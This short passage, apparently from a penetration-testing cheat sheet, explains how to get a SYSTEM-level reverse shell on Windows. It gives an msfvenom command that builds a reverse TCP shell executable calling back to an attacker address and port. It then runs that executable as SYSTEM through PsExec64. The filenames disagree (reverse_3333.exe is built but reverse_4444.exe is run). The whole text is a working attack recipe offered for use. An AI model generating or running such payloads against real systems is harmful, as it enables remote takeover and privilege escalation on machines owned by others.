Reverse shell to system

Generate a payload

msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=172.50.50.50 LPORT=3333 -f exe -o reverse_3333.exe

Upload PsExec64.exe and the reverse executable to the target machine and execute the following.

PsExec64.exe -i -accepteula -d -s reverse_4444.exe

Last updated